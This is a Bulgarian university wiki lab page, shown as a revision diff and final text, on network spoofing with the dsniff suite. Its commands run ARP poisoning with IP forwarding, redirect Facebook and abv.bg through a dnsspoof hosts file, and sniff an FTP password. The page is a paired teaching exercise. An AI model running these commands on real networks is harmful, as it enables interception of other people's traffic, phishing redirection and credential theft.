Difference between revisions of "Spoofing"
(→dsniff) |
|||
(6 intermediate revisions by the same user not shown) | |||
Line 34: | Line 34: | ||
:~$ apt-get install dsniff | :~$ apt-get install dsniff | ||
− | == arpspoof == | + | == Пренасочване на трафика с arpspoof == |
− | + | '''Задача:''' Да се пренасочи чужд трафик през вашата машина. | |
− | + | ||
− | victim - машината, която ще се подслушва | + | *victim - машината, която ще се подслушва |
− | gateway - | + | *gateway - рутер на мрежата |
Задачата да се изпълни по двама (на два компютъра). | Задачата да се изпълни по двама (на два компютъра). | ||
+ | *Victim ще бъде потребител на първия компютър. Ще отваря различни страници. | ||
+ | *На вторият компютър ще има стартирана виртуалка с Linux, от която ще се прави атаката за пренасочване на трафика. На вторият компютър ще има стартиран tcpdump който ще записва трафика. | ||
+ | ** ''tcpdump "port 80" -w trafik'' | ||
+ | *След определен време да се спре tcpdump файла с трафика да се разгледа с Wireshark | ||
− | + | стартиране на arpspoof | |
− | |||
− | |||
− | |||
− | стартиране на | ||
$arpspoof victim -t gateway | $arpspoof victim -t gateway | ||
$arpspoof gateway -t victim | $arpspoof gateway -t victim | ||
Line 53: | Line 53: | ||
Включване на IP forwarding, иначе жертвата ще загуби свързаност | Включване на IP forwarding, иначе жертвата ще загуби свързаност | ||
$echo 1 > /proc/sys/net/ipv4/ip_forward | $echo 1 > /proc/sys/net/ipv4/ip_forward | ||
− | |||
− | |||
== dnsspoof == | == dnsspoof == | ||
− | 1. | + | 1. Създаване на web сървър. |
− | + | 2. Конфигуриране домeйните, които искаме да фалшифицираме. | |
− | 2. | + | Заменете в примерния файл IP адресите с адреса на вашия web server, a имената на домейни с домейните, които искаме да фалшифицираме. |
Създаване на файл. | Създаване на файл. | ||
− | + | $nano host.new | |
Примерно съдържание. | Примерно съдържание. | ||
Line 71: | Line 69: | ||
2. Стартирайте на програмата като администратор | 2. Стартирайте на програмата като администратор | ||
− | + | $dnsspoof -f host.new | |
Line 79: | Line 77: | ||
Реализирайте ftp връзка. Използвайте dsniff за да прихванете паролата | Реализирайте ftp връзка. Използвайте dsniff за да прихванете паролата | ||
+ | |||
+ | == Използване на scp == | ||
==mailsnarf == | ==mailsnarf == | ||
[[Category:Мрежова сигурност]] | [[Category:Мрежова сигурност]] |
Latest revision as of 09:38, 17 October 2015
Contents
dsniff
dsniff Включва различни инструменти даващи възможност за "компрометиране на мрежата"
Включени инструменти:
- arpspoof - Send out unrequested (and possibly forged) arp replies.
- dnsspoof - forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
- dsniff - password sniffer for several protocols.
filesnarf - saves selected files sniffed from NFS traffic.
macof - flood the local network with random MAC addresses.
mailsnarf - sniffs mail on the LAN and stores it in mbox format.
msgsnarf - record selected messages from different Instant Messengers.
sshmitm - SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
sshow - SSH traffic analyser.
tcpkill - kills specified in-progress TCP connections.
tcpnice - slow down specified TCP connections via "active" traffic shaping.
urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.
webmitm - HTTP / HTTPS monkey-in-the-middle. transparently proxies.
webspy - sends URLs sniffed from a client to your local browser (requires libx11-6 installed).
Инсталация:
:~$ apt-get install dsniff
Пренасочване на трафика с arpspoof
Задача: Да се пренасочи чужд трафик през вашата машина.
- victim - машината, която ще се подслушва
- gateway - рутер на мрежата
Задачата да се изпълни по двама (на два компютъра).
- Victim ще бъде потребител на първия компютър. Ще отваря различни страници.
- На вторият компютър ще има стартирана виртуалка с Linux, от която ще се прави атаката за пренасочване на трафика. На вторият компютър ще има стартиран tcpdump който ще записва трафика.
- tcpdump "port 80" -w trafik
- След определен време да се спре tcpdump файла с трафика да се разгледа с Wireshark
стартиране на arpspoof
$arpspoof victim -t gateway $arpspoof gateway -t victim
Включване на IP forwarding, иначе жертвата ще загуби свързаност
$echo 1 > /proc/sys/net/ipv4/ip_forward
dnsspoof
1. Създаване на web сървър.
2. Конфигуриране домeйните, които искаме да фалшифицираме. Заменете в примерния файл IP адресите с адреса на вашия web server, a имената на домейни с домейните, които искаме да фалшифицираме.
Създаване на файл.
$nano host.new
Примерно съдържание.
172.16.16.165 *.facebook.com 172.16.16.165 *.abv.bg
2. Стартирайте на програмата като администратор
$dnsspoof -f host.new
След стартиране програмата слуша за dns запитвания.
dsniff
Реализирайте ftp връзка. Използвайте dsniff за да прихванете паролата